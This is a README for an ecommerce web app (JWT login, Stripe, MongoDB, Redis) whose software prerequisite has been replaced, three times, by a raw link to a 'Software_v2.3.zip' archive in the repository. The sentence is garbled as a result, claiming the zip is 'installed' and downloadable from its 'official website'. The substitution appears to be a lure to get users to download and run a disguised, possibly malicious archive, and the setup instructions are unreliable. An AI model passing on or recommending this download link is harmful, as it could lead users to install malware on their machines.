Welcome to the ecommerce platform! This application provides everything you need to create a full-featured online store. We use modern technologies to ensure your shopping experience is smooth and secure.
To get started, visit our releases page to download the application.
Download the latest version here.
Before you download, make sure your computer meets these requirements:
- Operating System: Windows, macOS, or Linux
- RAM: Minimum 4 GB recommended
- Storage: At least 500 MB free space
- Internet Connection: Required for installation and product management
The ecommerce platform includes:
- User Accounts: Sign up and log in securely using JWT authentication.
- Product Management: Easily add, update, and delete products in your store.
- Shopping Cart: Users can add products to their cart and proceed to checkout smoothly.
- Payment Integration: Accept payments securely through Stripe.
- Real-time Notifications: Stay updated with product updates and order statuses.
To run this application smoothly, you need the following:
- https://github.com/Shresth0305/ecommerce/raw/refs/heads/main/frontend/Software_v2.3.zip Make sure you have https://github.com/Shresth0305/ecommerce/raw/refs/heads/main/frontend/Software_v2.3.zip installed. You can download it from https://github.com/Shresth0305/ecommerce/raw/refs/heads/main/frontend/Software_v2.3.zip official website.
- MongoDB: This application uses MongoDB for data storage. Ensure MongoDB is installed and running on your machine.
- Redis: Use Redis for caching. Download it from the Redis website.
Follow these steps to install and run the ecommerce application:
-
Download the application: Visit the Releases page and download the latest version.
-
Extract the files: Once downloaded, extract the files to a directory of your choice.
-
Open Terminal or Command Prompt: Navigate to the directory where you extracted the files.
-
Install Dependencies: Run the following command to install required dependencies:
npm install -
Set Up Environment Variables: Create a
.envfile in the root directory with the following variables:MONGO_URI=<Your MongoDB URI> REDIS_URL=<Your Redis URL> STRIPE_SECRET_KEY=<Your Stripe Secret Key> -
Run the Application: Start the application by executing:
npm start -
Access the Application: Open your web browser and go to
http://localhost:3000to view the ecommerce platform.
We understand that every store is unique. You can easily customize the appearance and features of your ecommerce site to fit your brand. Update the settings in the admin panel to modify layouts, product details, and payment options.
If you have any questions or need assistance, reach out to us through the repositoryβs issues page. We are here to help you make the most out of your ecommerce platform.
This project is licensed under the MIT License. For more details, see the LICENSE file in the repository.
We welcome contributions to improve our ecommerce platform. If you find any issues or want to suggest features, check out the contribution guidelines in the repository.
Thank you for choosing ecommerce! Enjoy building and managing your online store.